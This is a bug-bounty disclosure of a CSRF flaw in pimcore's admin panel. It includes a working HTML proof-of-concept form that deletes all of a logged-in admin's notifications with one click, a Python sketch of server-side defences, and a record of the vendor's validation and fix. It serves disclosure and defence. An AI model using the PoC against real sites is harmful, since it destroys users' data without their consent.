Cross-Site Request Forgery (CSRF) in pimcore/pimcore

Valid

Reported on

Jul 30th 2021


✍️ Description

Your application does not have any CSRF protection, and the SameSite attribute is set to Lax. Because SameSite=Lax still sends the session cookie on top-level GET navigations, any action that alters data via an HTTP GET request is, without doubt, vulnerable to CSRF.

First, open the HTML payload below in a browser; you should then see that all notifications have been deleted.

🕵️‍♂️ Proof of Concept

// PoC.html

<html>
<body>
<!-- Rewrites the visible URL so the Referer sent to the target reveals only "/" -->
<script>history.pushState('', '', '/')</script>
<!-- No method attribute, so the form submits as a GET to the delete-all endpoint;
     SameSite=Lax still attaches the admin session cookie to this top-level navigation -->
<form action="https://x.pimcore.fun/admin/notification/delete-all">
<!-- "&#95;dc" is the HTML-encoded parameter name "_dc" -->
<input type="hidden" name="&#95;dc" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

I tested this payload on both the stable and dev editions (on x.pimcore.fun).

💥 Impact

This vulnerability makes it possible to delete every notification with only one click.
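The following is an added example, not code from this report or from the pimcore project. It sketches in Python the server-side checks that would stop the PoC above: refusing GET for a state-changing action, requiring a per-session CSRF token compared in constant time, and verifying the Origin/Referer header. The request and session dictionaries, the ADMIN_ORIGIN constant, and all function names are constructed for illustration and do not correspond to any real pimcore API.

```python
import hmac
import secrets
from urllib.parse import urlparse

# Constructed for this example: the origin the admin panel is served from.
ADMIN_ORIGIN = "https://x.pimcore.fun"


def issue_csrf_token(session):
    """Create (or reuse) a random per-session token to embed in admin forms."""
    if "csrf_token" not in session:
        session["csrf_token"] = secrets.token_urlsafe(32)
    return session["csrf_token"]


def _origin_allowed(headers):
    """Accept only requests whose Origin (or, failing that, Referer) is our own."""
    origin = headers.get("Origin")
    if origin is None:
        referer = headers.get("Referer")
        if referer is None:
            return False
        parsed = urlparse(referer)
        origin = f"{parsed.scheme}://{parsed.netloc}"
    return origin == ADMIN_ORIGIN


def handle_delete_all(request, session):
    """Hardened stand-in for the delete-all notification handler.

    request: dict with 'method', 'headers' (dict) and 'form' (dict).
    session: dict holding the logged-in user's server-side session state.
    Returns (status_code, message).
    """
    # 1. A state-changing action must never be reachable via a safe method.
    if request["method"] != "POST":
        return 405, "state-changing action requires POST"
    # 2. Defence in depth: reject requests that do not originate from our site.
    if not _origin_allowed(request["headers"]):
        return 403, "cross-origin request rejected"
    # 3. Primary control: the token submitted must match the session's token.
    expected = session.get("csrf_token")
    supplied = request["form"].get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return 403, "invalid CSRF token"
    session["notifications"] = []
    return 200, "all notifications deleted"


def simulate_poc(session):
    """Request shaped like the PoC form: a top-level GET carrying the session
    cookie but no token, with an attacker-controlled Referer (constructed)."""
    req = {
        "method": "GET",
        "headers": {"Referer": "https://attacker.example/"},
        "form": {"_dc": ""},
    }
    return handle_delete_all(req, session)


def simulate_legit(session):
    """A same-origin POST from the admin UI with the session's token."""
    token = issue_csrf_token(session)
    req = {
        "method": "POST",
        "headers": {"Origin": ADMIN_ORIGIN},
        "form": {"csrf_token": token},
    }
    return handle_delete_all(req, session)


if __name__ == "__main__":
    s = {"notifications": ["n1", "n2"]}
    print(simulate_poc(s), s["notifications"])    # rejected, nothing deleted
    print(simulate_legit(s), s["notifications"])  # accepted, list emptied
```

Requiring POST on its own would not be enough: the per-session token is the primary control, and the method restriction, the Origin/Referer check and SameSite=Lax are layers on top of it. The constant-time comparison avoids leaking token bytes through timing differences.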

Occurrences

We have contacted a member of the pimcore team and are waiting to hear back 2 years ago
Bernhard Rusch validated this vulnerability 2 years ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
Bernhard Rusch marked this as fixed with commit 80713c 2 years ago
Bernhard Rusch has been awarded the fix bounty
This vulnerability will not receive a CVE